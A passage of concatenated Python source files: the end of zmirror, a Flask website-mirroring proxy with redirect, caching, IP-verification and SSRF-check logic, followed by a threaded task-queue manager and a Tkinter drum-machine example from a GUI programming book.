dbgprint('add to ip_whitelist because cookies:', request.remote_addr)
else:
return redirect(
"/ip_ban_verify_page?origin=" + base64.urlsafe_b64encode(str(request.url).encode(encoding='utf-8')).decode(
encoding='utf-8'),
code=302)
return None
def prior_request_redirect():
"""对用户的请求进行按需重定向处理
与 rewrite_client_request() 不同, 使用301/307等进行外部重定向, 不改变服务器内部数据
遇到任意一个需要重定向的, 就跳出本函数
这是第一阶段重定向
第一阶段重定向, 是在 rewrite_client_request() 内部隐式重写 *之前* 的重定向
第二阶段重定向, 是在 rewrite_client_request() 内部隐式重写 *之后* 的重定向
如果 `custom_prior_request_redirect_enable` 启用, 则会调用 custom_func.custom_prior_redirect_func() 进行自定义重定向
:return: 如果不需要重定向, 则返回None, 否则返回重定向的 Response
:rtype: Union[Response, None]
"""
# a non-external domain was mistakenly requested through /extdomains/, redirect to fix it
if not parse.is_external_domain and '/extdomains/' == request.path[:12]:
dbgprint('Requesting main domain in extdomains, redirect back.')
return redirect(parse.remote_path_query, code=307)
# site isolation: the referer tells which sub-mirror we are in; inside an isolated sub-mirror, urls without /extdomains/ are redirected and fixed
if enable_individual_sites_isolation and '/extdomains/' != request.path[:12] and request.headers.get('referer'):
reference_domain = decode_mirror_url(request.headers.get('referer'))['domain']
if reference_domain in isolated_domains:
return redirect(encode_mirror_url(parse.remote_path_query, reference_domain), code=307)
if url_custom_redirect_enable:
# simple custom redirects, see config: url_custom_redirect_list
if request.path in url_custom_redirect_list:
redirect_to = request.url.replace(request.path, url_custom_redirect_list[request.path], 1)
dbgprint('Redirect from', request.url, 'to', redirect_to)
return redirect(redirect_to, code=307)
# regex-based custom redirects, see config: url_custom_redirect_regex
for regex_match, regex_replace in url_custom_redirect_regex:
if re.match(regex_match, parse.remote_path_query, flags=re.IGNORECASE) is not None:
redirect_to = re.sub(regex_match, regex_replace, parse.remote_path_query, flags=re.IGNORECASE)
dbgprint('Redirect from', request.url, 'to', redirect_to)
return redirect(redirect_to, code=307)
if custom_prior_request_redirect_enable:
# 自定义重定向
redirection = custom_prior_redirect_func(request, parse) # type: Union[Response, None]
if redirection is not None:
return redirection
def posterior_request_redirect():
"""
This is redirect stage two, run *after* the implicit internal rewrite.
Stage one runs *before* the implicit rewrite inside rewrite_client_request(),
stage two runs *after* it.
The function returns as soon as any rule asks for a redirect.
:return: None if no redirect is needed, otherwise the redirect Response
:rtype: Union[Response, None]
"""
# CDN soft redirect
# see the explanation of the cdn_redirect_code_if_cannot_hard_rewrite option in the config for details
if enable_static_resource_CDN:  # master switch for the CDN feature
if (cdn_redirect_code_if_cannot_hard_rewrite  # switch for the soft (301/307) CDN redirect
# the resource behind this URL is known, i.e. it has been successfully requested before
and parse.url_no_scheme in url_to_use_cdn
# and it has been judged suitable for the CDN
and url_to_use_cdn[parse.url_no_scheme][0]
# only GET resources are eligible
and parse.method == 'GET'
# only redirect when the size exceeds the lower bound
and int(url_to_use_cdn[parse.url_no_scheme][2]) > cdn_soft_redirect_minimum_size
# if the requester's UA looks like the CDN provider's crawler, serve the real resource instead
and not is_ua_in_whitelist(str(request.user_agent))
):
# this urljoin turns a url like https://foo.com/a.png?q=233 into the corresponding CDN URL, e.g. https://cdn.com/a.png?q=233
redirect_to_url = urljoin(
my_host_scheme
# pick a CDN domain from a checksum (adler32) of the url, taken modulo the number of CDN domains
# using a checksum rather than a random number guarantees the same URL always maps to the same CDN domain,
# which improves CDN and cache hit rates
+ CDN_domains[zlib.adler32(parse.url_no_scheme.encode()) % cdn_domains_number],
extract_url_path_and_query()  # this yields the /a.png?q=233 part of the target url
)
if cdn_redirect_encode_query_str_into_url:
# 将 ?q=233 这种查询字串编码进path, 详情看config里的说明
redirect_to_url = embed_real_url_to_embedded_url(
redirect_to_url, url_mime=url_to_use_cdn[parse.url_no_scheme][1])
return redirect(redirect_to_url, code=cdn_redirect_code_if_cannot_hard_rewrite)
# 本地缓存若命中则直接返回
if local_cache_enable:
resp = try_get_cached_response(parse.remote_url, parse.client_header)
if resp is not None:
dbgprint('CacheHit,Return')
if parse.time.get("start_time") is not None:
parse.set_extra_resp_header('X-Compute-Time', "%.4f" % (process_time() - parse.time["start_time"]))
return resp
# 基于 domain_guess 的重定向
if (parse.remote_domain, request.path) in domain_guess_cache:
domain = domain_guess_cache[(parse.remote_domain, request.path)]
rewrited_url = encode_mirror_url( # 重写后的url
parse.remote_path_query,
remote_domain=domain,
is_scheme=True,
)
dbgprint("Redirect via domain_guess_cache, from", request.url, "to", rewrited_url)
return redirect(rewrited_url, code=307)
def assemble_parse():
"""将用户请求的URL解析为对应的目标服务器URL"""
_temp = decode_mirror_url()
parse.remote_domain = _temp['domain'] # type: str
parse.is_https = _temp['is_https'] # type: bool
parse.remote_path = _temp['path'] # type: str
parse.remote_path_query = _temp['path_query'] # type: str
parse.is_external_domain = is_external_domain(parse.remote_domain)
parse.remote_url = assemble_remote_url() # type: str
parse.url_no_scheme = parse.remote_url[parse.remote_url.find('//') + 2:] # type: str
recent_domains[parse.remote_domain] = True # 写入最近使用的域名
dbgprint('after assemble_parse, url:', parse.remote_url, ' path_query:', parse.remote_path_query)
def rewrite_client_request():
"""
Every rewrite done here only affects the program internally and is invisible to the requester.
Unlike the external 301/307 redirects of prior_request_redirect(),
this function "redirects" by changing internal program variables.
Returns True if a rewrite happened (some settings then need to be re-derived), False otherwise.
After a rewrite the function does not exit; it continues with the next rule, so the order of the rewrites matters.
"""
has_been_rewrited = False
# ------------- request rewrites begin ----------------
if cdn_redirect_encode_query_str_into_url:
real_url = extract_real_url_from_embedded_url(request.url)
if real_url is not None:
dbgprint("BeforeEmbeddedExtract:", request.url, " After:", real_url)
request.url = real_url
request.path = urlsplit(real_url).path
has_been_rewrited = True
if url_custom_redirect_enable and shadow_url_redirect_regex:
_path_query = extract_url_path_and_query()
_path_query_raw = _path_query
for before, after in shadow_url_redirect_regex:
_path_query = re.sub(before, after, _path_query)
if _path_query != _path_query_raw:
dbgprint('ShadowUrlRedirect:', _path_query_raw, 'to', _path_query)
request.url = myurl_prefix + _path_query
request.path = urlsplit(_path_query).path
has_been_rewrited = True
break
# ------------- request rewrites end ----------------
# if any rewrite happened, has_been_rewrited is True
# the rewrites above change request.url,
# so parse has to be re-assembled here
if has_been_rewrited:
assemble_parse()
return has_been_rewrited
# ################# End Middle Functions #################
# ################# Begin Flask After Request ################
@app.after_request
def zmirror_after_request(response):
# release the lock held in connection_pool
if enable_connection_keep_alive:
connection_pool.release_lock()
return response
# ################# End Flask After Request ################
# ################# Begin Flask #################
@app.route('/zmirror_stat')
def zmirror_status():
"""返回服务器的一些状态信息"""
if request.remote_addr and request.remote_addr != '127.0.0.1':
return generate_simple_resp_page(b'Only 127.0.0.1 are allowed', 403)
output = ""
output += strx('extract_real_url_from_embedded_url', extract_real_url_from_embedded_url.cache_info())
output += strx('\nis_content_type_streamed', is_mime_streamed.cache_info())
output += strx('\nembed_real_url_to_embedded_url', embed_real_url_to_embedded_url.cache_info())
output += strx('\ncheck_global_ua_pass', check_global_ua_pass.cache_info())
output += strx('\nextract_mime_from_content_type', extract_mime_from_content_type.cache_info())
output += strx('\nis_content_type_using_cdn', is_content_type_using_cdn.cache_info())
output += strx('\nis_ua_in_whitelist', is_ua_in_whitelist.cache_info())
output += strx('\nis_mime_represents_text', is_mime_represents_text.cache_info())
output += strx('\nis_domain_match_glob_whitelist', is_domain_match_glob_whitelist.cache_info())
output += strx('\nverify_ip_hash_cookie', verify_ip_hash_cookie.cache_info())
output += strx('\nis_denied_because_of_spider', is_denied_because_of_spider.cache_info())
output += strx('\nis_ip_not_in_allow_range', is_ip_not_in_allow_range.cache_info())
output += strx('\n\ncurrent_threads_number', threading.active_count())
# output += strx('\nclient_requests_text_rewrite', client_requests_text_rewrite.cache_info())
# output += strx('\nextract_url_path_and_query', extract_url_path_and_query.cache_info())
output += strx('\n----------------\n')
output += strx('\ndomain_alias_to_target_set', domain_alias_to_target_set)
return "<pre>" + output + "</pre>\n"
@app.route('/ip_ban_verify_page', methods=['GET', 'POST'])
def ip_ban_verify_page():
"""生成一个身份验证页面"""
if request.method == 'GET':
dbgprint('Verifying IP:', request.remote_addr)
form_body = ''
for q_id, _question in enumerate(human_ip_verification_questions):
form_body += r"""%s <input type="text" name="%d" placeholder="%s" style="width: 190px;" /><br/>""" \
% (_question[0], q_id, (html_escape(_question[2]) if len(_question) >= 3 else ""))
for rec_explain_string, rec_name, input_type in human_ip_verification_identity_record:
form_body += r"""%s %s<input type="%s" name="%s" /><br/>""" % (
rec_explain_string,
('<span style="color: red;">(必填)</span> ' if human_ip_verification_answer_any_one_questions_is_ok else ""),
html_escape(input_type), html_escape(rec_name))
if 'origin' in request.args:
form_body += r"""<input type="hidden" name="origin" value="%s" style="width: 190px;" />""" % html_escape(
request.args.get('origin'))
return r"""<!doctype html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>%s</title>
</head>
<body>
<h1>%s</h1>
<p>这样的验证只会出现一次,通过后您会被加入白名单,之后相同IP的访问不会再需要验证。<br/>
提示: 由于手机和宽带IP经常会发生改变,您可能会多次看到这一页面。</p>
%s <br>
<pre style="border: 1px dashed;">%s</pre>
<form method='post'>%s<button type='submit'>递交</button>
</form>
</body>
</html>""" % (
html_escape(human_ip_verification_title), html_escape(human_ip_verification_title),
("只需要回答出以下<b>任意一个</b>问题即可" if human_ip_verification_answer_any_one_questions_is_ok
else "你需要回答出以下<b>所有问题</b>"),
human_ip_verification_description, form_body)
elif request.method == 'POST':
dbgprint('Verifying Request Form', request.form)
# iterate over all the questions and check whether they were answered correctly
for q_id, _question in enumerate(human_ip_verification_questions):
submitted_answer = request.form.get(str(q_id), '')
if submitted_answer == '': # this question was not answered
if human_ip_verification_answer_any_one_questions_is_ok: # if answering any single question is enough, just skip it
continue
else: # if every question must be answered, report an error
return generate_simple_resp_page(b'Please answer question: ' + _question[0].encode(), 200)
if submitted_answer != _question[1]: # answered, but the answer is wrong
return generate_simple_resp_page(b'Wrong answer in: ' + _question[0].encode(), 200)
elif human_ip_verification_answer_any_one_questions_is_ok:
break # one correct answer is enough to pass
else: # this else only runs when the for loop completes without break
if human_ip_verification_answer_any_one_questions_is_ok: # reaching here with this flag set means not a single question was answered
return generate_simple_resp_page(b'Please answer at least ONE question', 200)
record_dict = {}
for rec_explain_string, rec_name, form_type in human_ip_verification_identity_record:
if rec_name not in request.form or not request.form[rec_name]:
return generate_simple_resp_page(b'Param Missing or Blank: ' + rec_explain_string.encode(), 200)
else:
record_dict[rec_name] = request.form[rec_name]
origin = '/'
if 'origin' in request.form:
try:
origin = base64.urlsafe_b64decode(request.form.get('origin')).decode(encoding='utf-8')
except: # coverage: exclude
return generate_error_page(
"Unable to decode origin from value:" + html_escape(request.form.get('origin')), is_traceback=True)
else:
netloc = urlsplit(origin).netloc
if netloc and netloc != my_host_name:
origin = '/'
if identity_verify_required:
if not custom_identity_verify(record_dict):
return generate_simple_resp_page(b'Verification Failed, please check', 200)
resp = generate_html_redirect_page(origin, msg=human_ip_verification_success_msg)
if human_ip_verification_whitelist_from_cookies:
_hash = generate_ip_verify_hash(record_dict)
resp.set_cookie(
'zmirror_verify',
_hash,
expires=datetime.now() + timedelta(days=human_ip_verification_whitelist_cookies_expires_days),
max_age=human_ip_verification_whitelist_cookies_expires_days * 24 * 3600
# httponly=True,
# domain=my_host_name
)
record_dict['__zmirror_verify'] = _hash
elif enable_custom_access_cookie_generate_and_verify:
_hash = custom_generate_access_cookie(record_dict, request)
dbgprint('SelfGeneratedCookie:', _hash)
if _hash is None:
return generate_simple_resp_page(b'Verification Failed, please check', 200)
resp.set_cookie(
'zmirror_verify',
_hash,
expires=datetime.now() + timedelta(days=human_ip_verification_whitelist_cookies_expires_days),
max_age=human_ip_verification_whitelist_cookies_expires_days * 24 * 3600
# httponly=True,
# domain=my_host_name
)
record_dict['__zmirror_verify'] = _hash
ip_whitelist_add(request.remote_addr, info_record_dict=record_dict)
return resp
@app.route('/', methods=['GET', 'POST', 'OPTIONS', 'PUT', 'DELETE', 'HEAD', 'PATCH'])
@app.route('/<path:input_path>', methods=['GET', 'POST', 'OPTIONS', 'PUT', 'DELETE', 'HEAD', 'PATCH'])
def zmirror_enter(input_path='/'):
"""入口函数的壳, 只是包了一层异常处理, 实际是 main_function() """
try:
resp = main_function(input_path=input_path)
# add the extra response headers
for name, value in parse.extra_resp_headers.items():
resp.headers.set(name, value)
# add the extra cookies
for name, cookie_string in parse.extra_cookies.items():
resp.headers.add("Set-Cookie", cookie_string)
except: # coverage: exclude
return generate_error_page(is_traceback=True)
else:
return resp
# noinspection PyUnusedLocal
def main_function(input_path='/'):
"""本程序的实际入口函数
:rtype: Response
"""
dbgprint('-----BeginRequest-----')
# parse is a zmirror-specific thread-local variable, similar in spirit to flask's request
# it is no less important than request and is used throughout zmirror
# see zmirror.threadlocal.ZmirrorThreadLocal for the meaning of its fields
parse.init()
parse.method = request.method
parse.time["start_time"] = process_time() # to display compute time
# resolve the requested URL into the corresponding target-server URL
assemble_parse()
# inspect and filter the client request
# requests that do not meet the requirements (e.g. crawlers) are terminated here
# this function does not modify parse
r = filter_client_request()
if r is not None: # a non-None return value means a response must be sent back to the client
dbgprint('-----EndRequest(filtered out)-----')
return r
# first-level redirect of the client request (redirect before the implicit rewrite)
# this function does not modify parse
# this redirect is visible to the client, as a 301/302/307 redirect
r = prior_request_redirect()
if r is not None:
# None means no redirect happened, so continue as usual
# a flask Response object means a redirect is required; simply return it as-is
# the same applies below
return r
# perform the implicit rewrite/redirect of the request
# the implicit rewrite only takes effect inside zmirror and is transparent to the browser
# the rewrite may modify flask's built-in request variable
# it may also modify parse
has_been_rewrited = rewrite_client_request()
# first layer of SSRF checks, preventing requests to sites that are not allowed
if ssrf_check_layer_1():
return generate_simple_resp_page(b'SSRF Prevention! Your domain is NOT ALLOWED.', 403)
# extract the browser request headers after the necessary rewrites
parse.client_header = extract_client_header() # type: dict
# second-level redirect of the client request (redirect after the implicit rewrite)
# like the first-level redirect, it is a 301/302/307 redirect
r = posterior_request_redirect()
if r is not None:
return r
# parse and rewrite the data payload of the browser request
parse.request_data, parse.request_data_encoding = prepare_client_request_data()
# send the request to the real remote server,
# attempting a domain_guess if it returns 404/500
# see the comments in guess_correct_domain() for an explanation of domain_guess
request_remote_site()
# parse the remote server's response
parse_remote_response()
# generate our own response
resp = generate_our_response()
# store our server's entire response (headers included)
if local_cache_enable and parse.cacheable:
put_response_to_local_cache(parse.remote_url, resp, without_content=parse.streamed_our_response)
dbgprint('-----EndRequest-----')
return resp
@app.route('/crossdomain.xml')
def crossdomain_xml():
return Response("""<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>""", content_type='text/x-cross-domain-policy')
@app.route('/about_zmirror')
def about_zmirror():
return Response("""zmirror
version: {version}
Author: {author}
Github: {github_url}
Note: Love Luciaz Forever!
Mirroring: {source_site}
This site: {my_domain}
""".format(version=CONSTS.__VERSION__, author=CONSTS.__AUTHOR__,
github_url=CONSTS.__GITHUB_URL__, source_site=target_domain,
my_domain=my_host_name),
content_type='text/plain')
# ################# End Flask #################
# ################# Begin Post (auto)Exec Section #################
# ########### domain replacer prefix string buff ###############
prefix_buff = {}
for _domain in allowed_domains_set:
prefix_buff[_domain] = calc_domain_replace_prefix(_domain)
if human_ip_verification_enabled:
single_ip_allowed_set = load_ip_whitelist_file()
else:
single_ip_allowed_set = set()
try:
if unittest_mode:
import importlib
# in unittest mode, custom_func also imports zmirror,
# which adds an extra reference to it,
# so every time zmirror is reloaded under unittest, custom_func has to be reloaded as well
importlib.reload(importlib.import_module("custom_func"))
from custom_func import *
except: # coverage: exclude
pass
if custom_text_rewriter_enable:
try:
from custom_func import custom_response_text_rewriter
except: # coverage: exclude
warnprint('Cannot import custom_response_text_rewriter from custom_func.py,'
' `custom_text_rewriter` is now disabled(if it was enabled)')
raise
if identity_verify_required:
try:
from custom_func import custom_identity_verify
except: # coverage: exclude
identity_verify_required = False
warnprint('Cannot import custom_identity_verify from custom_func.py,'
' `identity_verify` is now disabled (if it was enabled)')
raise
if enable_custom_access_cookie_generate_and_verify:
try:
from custom_func import custom_generate_access_cookie, custom_verify_access_cookie
except: # coverage: exclude
enable_custom_access_cookie_generate_and_verify = False
errprint('Cannot import custom_generate_access_cookie and custom_verify_access_cookie from custom_func.py,'
' `enable_custom_access_cookie_generate_and_verify` is now disabled (if it was enabled)')
raise
if enable_cron_tasks:
for _task_dict in cron_tasks_list:
try:
_task_dict['target'] = globals()[_task_dict['target']]
cron_task_container(_task_dict, add_task_only=True)
except Exception as e:
errprint('UnableToInitCronTask', e)
raise
th = threading.Thread(target=cron_task_host, daemon=True)
th.start()
# ################# End Post (auto)Exec Section #################
if __name__ == '__main__':
errprint('Please use `python3 wsgi.py` to run')
exit()
|
async_task_manager.py
|
import queue
from threading import Thread
from typing import Any, Callable, ContextManager, Iterable, Mapping, Optional
from ..utils import get_logger
log = get_logger(__name__)
STOP = -1
STOP_TASK = (
STOP,
STOP,
STOP,
)
class Queue(queue.Queue):
def clear(self):
with self.mutex:
unfinished_tasks = self.unfinished_tasks - len(self.queue)
if unfinished_tasks <= 0:
if unfinished_tasks < 0:
raise ValueError("task_done() called too many times")
self.all_tasks_done.notify_all()
self.unfinished_tasks = unfinished_tasks
self.queue.clear()
self.not_full.notify_all()
class AsyncTaskManager(ContextManager):
"""
Multithreaded task manager.
Note that the manager itself is not thread-safe, meaning it can only be used from a single thread.
"""
def __init__(self, workers_amount: int = 5, iter_timeout: Optional[float] = None):
super().__init__()
self.iter_timeout = iter_timeout
self._task_queue: Queue = Queue()
self._result_queue: Queue = Queue()
self._total_task_count = 0
self._workers_count = 0
self.start_workers(workers_amount)
def __iter__(self):
return self
def __next__(self):
if self.is_work_done and self.is_empty:
raise StopIteration()
return self.get_result(timeout=self.iter_timeout)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.__del__()
def __del__(self):
self.kill()
@property
def is_work_done(self) -> bool:
"""
:return: True iff all task processing is done.
"""
return self._task_queue.unfinished_tasks == 0
@property
def is_empty(self) -> bool:
"""
:return: True iff all results have been fetched.
"""
return self._result_queue.unfinished_tasks == 0
@property
def is_closed(self) -> bool:
"""
:return: True iff all worker threads are closed.
"""
return self._workers_count == 0
@property
def total_task_count(self) -> int:
return self._total_task_count
def start_workers(self, workers_amount: int):
log.debug(f"Starting {workers_amount} workers.")
for i in range(workers_amount):
thread = Thread(target=self._work, daemon=True)
thread.start()
self._workers_count += 1
def add_task(self, func: Callable, args: Iterable = None, kwargs: Mapping = None):
if self.is_closed:
return
args = tuple(args) if args else ()
kwargs = kwargs or {}
self._total_task_count += 1
self._task_queue.put((func, args, kwargs))
def _work(self):
log.debug("Worker starting.")
while True:
func, args, kwargs = self._task_queue.get()
if func == STOP:
self._task_queue.task_done()
break
result = func(*args, **kwargs)
self._result_queue.put(result)
self._task_queue.task_done()
log.debug("Worker done.")
def get_result(self, timeout: Optional[float] = 3) -> Any:
result = self._result_queue.get(block=True, timeout=timeout)
self._result_queue.task_done()
return result
def stop_workers(self, amount: int = None):
if amount is None:
amount = self._workers_count
log.debug(f"Stopping {amount} workers.")
for i in range(amount):
self._task_queue.put(STOP_TASK)
self._workers_count -= 1
def kill(self):
log.debug(f"Removing all items from task queue (current size is {self._task_queue.qsize()})...")
self._task_queue.clear()
self.join()
def join(self):
log.debug("Joining all workers...")
self._task_queue.join() # Wait until all work is done
self.stop_workers()
self._task_queue.join() # Wait until all workers are dead
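# A minimal usage sketch (not part of the original module); it only relies on the public
# interface defined above: add_task(), iteration over the results, and the context manager protocol.
if __name__ == "__main__":
    def _square(x):
        return x * x

    with AsyncTaskManager(workers_amount=3, iter_timeout=5) as manager:
        for n in range(10):
            manager.add_task(_square, args=(n,))
        # iterating the manager drains the result queue as the workers finish their tasks
        print(sorted(manager))  # -> [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]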
|
3.07.py
|
"""
Code illustration: 3.07
Tkinter and Threading
**********************
New modules imported here:
- threading
New methods defined here:
- play_in_thread()
- toggle_play_button_state()
Method modified here:
- start_play()
- __init__ method - to override the close button
- on_play_button_clicked()
- on_stop_button_clicked()
- on_loop_button_toggled()
- play_pattern() - added a call to toggle_play_button_state()
Chapter 3 : Programmable Drum Machine
Tkinter GUI Application Development Blueprints
"""
import os
import time
import threading
from tkinter import Tk, Entry, W, E, N, S, PhotoImage, Checkbutton, Button, \
Menu, Frame, Label, Spinbox, END, BooleanVar
from tkinter import filedialog, messagebox
import pygame
PROGRAM_NAME = ' Explosion Drum Machine '
MAX_NUMBER_OF_PATTERNS = 10
MAX_NUMBER_OF_DRUM_SAMPLES = 5
MAX_NUMBER_OF_UNITS = 5
MAX_BPU = 5
INITIAL_NUMBER_OF_UNITS = 4
INITIAL_BPU = 4
INITIAL_BEATS_PER_MINUTE = 240
MIN_BEATS_PER_MINUTE = 80
MAX_BEATS_PER_MINUTE = 360
COLOR_1 = 'grey55'
COLOR_2 = 'khaki'
BUTTON_CLICKED_COLOR = 'green'
class DrumMachine:
def __init__(self, root):
self.root = root
self.root.title(PROGRAM_NAME)
self.all_patterns = [None] * MAX_NUMBER_OF_PATTERNS
self.beats_per_minute = INITIAL_BEATS_PER_MINUTE
self.current_pattern_index = 0
self.loop = True
self.now_playing = False
self.drum_load_entry_widget = [None] * MAX_NUMBER_OF_DRUM_SAMPLES
self.init_all_patterns()
self.init_gui()
def on_open_file_button_clicked(self, drum_index):
def event_handler():
file_path = filedialog.askopenfilename(defaultextension=".wav",
filetypes=[("Wave Files", "*.wav"), ("OGG Files", "*.ogg")])
if not file_path:
return
self.set_drum_file_path(drum_index, file_path)
self.display_all_drum_file_names()
return event_handler
def display_all_drum_file_names(self):
for i, drum_name in enumerate(self.get_list_of_drum_files()):
self.display_drum_name(i, drum_name)
def display_drum_name(self, text_widget_num, file_path):
if file_path is None:
return
drum_name = os.path.basename(file_path)
self.drum_load_entry_widget[text_widget_num].delete(0, END)
self.drum_load_entry_widget[text_widget_num].insert(0, drum_name)
#
# getters and setters begins
#
def get_current_pattern_dict(self):
return self.all_patterns[self.current_pattern_index]
def get_bpu(self):
return self.get_current_pattern_dict()['bpu']
def set_bpu(self):
self.get_current_pattern_dict()['bpu'] = int(self.bpu_widget.get())
def get_number_of_units(self):
return self.get_current_pattern_dict()['number_of_units']
def set_number_of_units(self):
self.get_current_pattern_dict(
)['number_of_units'] = int(self.number_of_units_widget.get())
def get_list_of_drum_files(self):
return self.get_current_pattern_dict()['list_of_drum_files']
def get_drum_file_path(self, drum_index):
return self.get_list_of_drum_files()[drum_index]
def set_drum_file_path(self, drum_index, file_path):
self.get_list_of_drum_files()[drum_index] = file_path
def get_is_button_clicked_list(self):
return self.get_current_pattern_dict()['is_button_clicked_list']
def set_is_button_clicked_list(self, num_of_rows, num_of_columns):
self.get_current_pattern_dict()['is_button_clicked_list'] = [
[False] * num_of_columns for x in range(num_of_rows)]
def init_all_patterns(self):
self.all_patterns = [
{
'list_of_drum_files': [None] * MAX_NUMBER_OF_DRUM_SAMPLES,
'number_of_units': INITIAL_NUMBER_OF_UNITS,
'bpu': INITIAL_BPU,
'is_button_clicked_list':
self.init_is_button_clicked_list(
MAX_NUMBER_OF_DRUM_SAMPLES,
INITIAL_NUMBER_OF_UNITS * INITIAL_BPU
)
}
for k in range(MAX_NUMBER_OF_PATTERNS)]
def on_pattern_changed(self):
pass
def on_number_of_units_changed(self):
self.set_number_of_units()
self.set_is_button_clicked_list(MAX_NUMBER_OF_DRUM_SAMPLES,
self.find_number_of_columns())
self.create_right_button_matrix()
def on_bpu_changed(self):
self.set_bpu()
self.set_is_button_clicked_list(MAX_NUMBER_OF_DRUM_SAMPLES,
self.find_number_of_columns())
self.create_right_button_matrix()
def play_in_thread(self):
self.thread = threading.Thread(target = self.play_pattern)
self.thread.start()
def on_play_button_clicked(self):
self.start_play()
self.toggle_play_button_state()
def start_play(self):
self.init_pygame()
self.play_in_thread()
def on_stop_button_clicked(self):
self.stop_play()
self.toggle_play_button_state()
def toggle_play_button_state(self):
if self.now_playing:
self.play_button.config(state="disabled")
else:
self.play_button.config(state="normal")
def exit_app(self):
self.now_playing = False
if messagebox.askokcancel("Quit", "Really quit?"):
self.root.destroy()
def stop_play(self):
self.now_playing = False
def init_pygame(self):
pygame.mixer.pre_init(44100, -16, 1, 512)
pygame.init()
def play_sound(self, sound_filename):
if sound_filename is not None:
pygame.mixer.Sound(sound_filename).play()
def get_column_from_matrix(self, matrix, i):
return [row[i] for row in matrix]
def play_pattern(self):
self.now_playing = True
self.toggle_play_button_state()
while self.now_playing:
play_list = self.get_is_button_clicked_list()
num_columns = len(play_list[0])
for column_index in range(num_columns):
column_to_play = self.get_column_from_matrix(
play_list, column_index)
for i, item in enumerate(column_to_play):
if item:
sound_filename = self.get_drum_file_path(i)
self.play_sound(sound_filename)
time.sleep(self.time_to_play_each_column())
if not self.now_playing: break
if not self.loop: break
self.now_playing = False
self.toggle_play_button_state()
def time_to_play_each_column(self):
beats_per_second = self.beats_per_minute / 60
time_to_play_each_column = 1 / beats_per_second
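# e.g. at the initial 240 BPM this is 240 / 60 = 4 beats per second,
# i.e. each column of the pattern matrix is held for 0.25 seconds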
return time_to_play_each_column
def on_loop_button_toggled(self):
self.loop = self.loopbuttonvar.get()
def on_beats_per_minute_changed(self):
self.beats_per_minute = int(self.beats_per_minute_widget.get())
def init_is_button_clicked_list(self, num_of_rows, num_of_columns):
return [[False] * num_of_columns for x in range(num_of_rows)]
def get_button_value(self, row, col):
return self.all_patterns[self.current_pattern_index][
'is_button_clicked_list'][row][col]
def find_number_of_columns(self):
return int(self.number_of_units_widget.get()) * int(self.bpu_widget.get())
def process_button_clicked(self, row, col):
self.set_button_value(row, col, not self.get_button_value(row, col))
self.display_button_color(row, col)
def set_button_value(self, row, col, bool_value):
self.all_patterns[self.current_pattern_index][
'is_button_clicked_list'][row][col] = bool_value
def on_button_clicked(self, row, col):
def event_handler():
self.process_button_clicked(row, col)
return event_handler
def display_all_button_colors(self):
number_of_columns = self.find_number_of_columns()
for r in range(MAX_NUMBER_OF_DRUM_SAMPLES):
for c in range(number_of_columns):
self.display_button_color(r, c)
def display_button_color(self, row, col):
bpu = int(self.bpu_widget.get())
original_color = COLOR_1 if ((col//bpu) % 2) else COLOR_2
button_color = BUTTON_CLICKED_COLOR if self.get_button_value(
row, col) else original_color
self.buttons[row][col].config(background=button_color)
def create_play_bar(self):
playbar_frame = Frame(self.root, height=15)
start_row = MAX_NUMBER_OF_DRUM_SAMPLES + 10
playbar_frame.grid(row=start_row, columnspan=13,
sticky=W + E, padx=15, pady=10)
self.play_icon = PhotoImage(file="images/play.gif")
self.play_button = Button(
playbar_frame, text='Play', image=self.play_icon, compound='left', command=self.on_play_button_clicked)
self.play_button.grid(row=start_row, column=1, padx=2)
Button(playbar_frame, text='Stop', command=self.on_stop_button_clicked).grid(
row=start_row, column=3, padx=2)
self.loopbuttonvar = BooleanVar()
self.loopbuttonvar.set(True)
self.loopbutton = Checkbutton(
playbar_frame, text='Loop', command=self.on_loop_button_toggled, variable=self.loopbuttonvar)
self.loopbutton.grid(row=start_row, column=16, padx=5)
Label(playbar_frame, text='Beats Per Minute').grid(
row=start_row, column=25)
self.beats_per_minute_widget = Spinbox(playbar_frame, from_=MIN_BEATS_PER_MINUTE, to=MAX_BEATS_PER_MINUTE, width=5,
increment=5.0, command=self.on_beats_per_minute_changed)
self.beats_per_minute_widget.grid(row=start_row, column=30)
self.beats_per_minute_widget.delete(0,"end")
self.beats_per_minute_widget.insert(0,INITIAL_BEATS_PER_MINUTE)
photo = PhotoImage(file='images/signature.gif')
label = Label(playbar_frame, image=photo)
label.image = photo
label.grid(row=start_row, column=50, padx=1, sticky='w')
def create_right_button_matrix(self):
right_frame = Frame(self.root)
right_frame.grid(row=10, column=6, sticky=W +
E + N + S, padx=15, pady=4)
self.buttons = [[None for x in range(
self.find_number_of_columns())] for x in range(MAX_NUMBER_OF_DRUM_SAMPLES)]
for row in range(MAX_NUMBER_OF_DRUM_SAMPLES):
for col in range(self.find_number_of_columns()):
self.buttons[row][col] = Button(
right_frame, command=self.on_button_clicked(row, col))
self.buttons[row][col].grid(row=row, column=col)
self.display_button_color(row, col)
def create_left_drum_loader(self):
left_frame = Frame(self.root)
left_frame.grid(row=10, column=0, columnspan=6, sticky=W + E + N + S)
open_file_icon = PhotoImage(file='images/openfile.gif')
for i in range(MAX_NUMBER_OF_DRUM_SAMPLES):
open_file_button = Button(left_frame, image=open_file_icon,
command=self.on_open_file_button_clicked(i))
open_file_button.image = open_file_icon
open_file_button.grid(row=i, column=0, padx=5, pady=4)
self.drum_load_entry_widget[i] = Entry(left_frame)
self.drum_load_entry_widget[i].grid(
row=i, column=4, padx=7, pady=4)
def create_top_bar(self):
topbar_frame = Frame(self.root, height=25)
topbar_frame.grid(row=0, columnspan=12, rowspan=10, padx=5, pady=5)
Label(topbar_frame, text='Pattern Number:').grid(row=0, column=1)
self.pattern_index_widget = Spinbox(topbar_frame, from_=0, to=MAX_NUMBER_OF_PATTERNS - 1, width=5,
command=self.on_pattern_changed)
self.pattern_index_widget.grid(row=0, column=2)
self.current_pattern_name_widget = Entry(topbar_frame)
self.current_pattern_name_widget.grid(row=0, column=3, padx=7, pady=2)
Label(topbar_frame, text='Number of Units:').grid(row=0, column=4)
